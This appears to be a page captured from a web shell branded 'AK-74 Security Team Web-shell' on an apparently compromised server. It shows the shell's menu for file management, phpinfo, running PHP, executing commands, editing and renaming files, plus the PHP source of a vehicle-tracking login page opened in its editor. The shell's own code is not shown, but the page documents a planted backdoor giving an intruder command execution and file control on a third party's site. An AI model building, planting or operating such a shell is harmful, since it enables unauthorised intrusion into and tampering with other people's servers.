.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php include ('init.php'); include ('func/fn_common.php'); // checkUserSession(); loadLanguage($gsValues['LANGUAGE']); if (isset($gsValues['SERVER_ENABLED'])) { if ($gsValues['SERVER_ENABLED'] == 'false') { echo 'Access to this server currently disabled.'; die; } } ?> <link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css"> <script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <!------ Include the above in your HEAD tag ----------> <!DOCTYPE html> <html> <head> <title>Login Page</title> <!--Made with love by Mutiullah Samim --> <!--Bootsrap 4 CDN--> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous"> <!--Fontawesome CDN--> <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css" integrity="sha384-mzrmE5qonljUremFsqc01SB46JvROS7bZs3IO2EmfFsd15uHvIt+Y8vEf7N7fWAU" crossorigin="anonymous"> <!--Custom styles--> <link rel="stylesheet" type="text/css" href="styles.css"> <title><? echo $gsValues['NAME'] . ' ' . $gsValues['VERSION']; ?></title> <? if (file_exists('favicon.png')) { echo '<link rel="shortcut icon" href="' . $gsValues['URL_ROOT'] . '/favicon.png" type="image/x-icon">'; } else { echo '<link rel="shortcut icon" href="' . $gsValues['URL_ROOT'] . '/favicon.ico" type="image/x-icon">'; } ?> <script type="text/javascript" src="js/jquery-2.1.4.min.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> <script type="text/javascript" src="js/jquery-migrate-1.2.1.min.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> <script type="text/javascript" src="js/jquery-ui.min.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> <script type="text/javascript" src="js/jquery.multiple.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> <script type="text/javascript" src="js/jquery.show-pass.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> <script type="text/javascript" src="js/gs.common.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> <script type="text/javascript" src="js/gs.connect.js?v=<? echo $gsValues['VERSION_ID']; ?>"></script> </head> <body> <div class="container"> <div class="slogan"> <img class="logo" src="<? echo $gsValues['URL_ROOT'] . '/img/' . $gsValues['LOGO']; ?>" /> </div> <div class="d-flex justify-content-center h-100"> <div class="card"> <div class="card-header"> <div class="d-flex justify-content-end social_icon"> <span><i style="font-size: 21px;" class="fa fa-taxi"></i></span> <span><i style="font-size: 21px;" class="fa fa-truck"></i></span> <span><i style="font-size: 21px;" class="fa fa-bus"></i></span> <span><i style="font-size: 21px;" class="fa fa-train"></i></span> <span><i style="font-size: 21px;" class="fa fa-helicopter"></i></span> <span><i style="font-size: 21px;" class="fa fa-motorcycle"></i></span> <span><i style="font-size: 21px;" class="fa fa fa-bicycle"></i></span> </div> <div class="float-left"> <a class="mobile-v" href="mobile/index.php" title="الدخول الى نسخة الهاتف "><img src="img/mobile.png" style="height:65px;width:55px;"></a> </div> <div class="float-right" style="display:none"> <select id="system_language" class="select float-right" onChange="switchLanguageLogin();"><? echo getLanguageList(); ?></select> </div> </div> <div class="card-body" style="padding-top: 5.25rem;"> <form> <div class="input-group form-group"> <div class="input-group-prepend"> <span class="input-group-text"><i class="fas fa-user"></i></span> </div> <input type="text" class="form-control" id="username" placeholder="username"> </div> <div class="input-group form-group"> <div class="input-group-prepend"> <span class="input-group-text"><i class="fas fa-key"></i></span> </div> <input type="password" class="form-control" id="password" placeholder="password"> </div> <div class="row align-items-center remember"> <input type="checkbox" id="remember_me">Remember Me </div> <div class="form-group"> <input type="submit" value="Login" onClick="connectLogin(); return false;" class="btn float-right login_btn"> </div> </form> </div> <div class="card-footer"> <div class="d-flex justify-content-center links"> </div> <div class="d-flex justify-content-center"> </div> </div> </div> </div> </div> </body> <style> /* Made with love by Mutiullah Samim*/ @import url('https://fonts.googleapis.com/css?family=Numans'); .float-right{ } html,body{ background-image: url("img/s0.jpg"); background-size: cover; background-repeat: no-repeat; height: 100%; font-family: 'Numans', sans-serif; } .container{ height: 100%; align-content: center; } .card{ height: 370px; margin-top: auto; margin-bottom: auto; width: 400px; background-color: rgba(0,0,0,0.5) !important; } .social_icon span{ font-size: 60px; margin-left: 10px; color: #115e8c; } .social_icon span:hover{ color: white; cursor: pointer; } .card-header h3{ color: white; } .social_icon{ position: absolute; right: 20px; top: -45px; } .input-group-prepend span{ width: 50px; background-color: #115e8c; color: black; border:0 !important; } input:focus{ outline: 0 0 0 0 !important; box-shadow: 0 0 0 0 !important; } .remember{ color: white; } .remember input { width: 20px; height: 20px; margin-left: 15px; margin-right: 5px; } .login_btn{ color: black; background-color: #115e8c; width: 100px; } .login_btn:hover{ color: black; background-color: white; } .links{ color: white; } .links a{ margin-left: 4px; } .slogan{ position: fixed; top: 10%; left: 50%; /* bring your own prefixes */ transform: translate(-50%, -50%); } </style> </html>
Rename:
-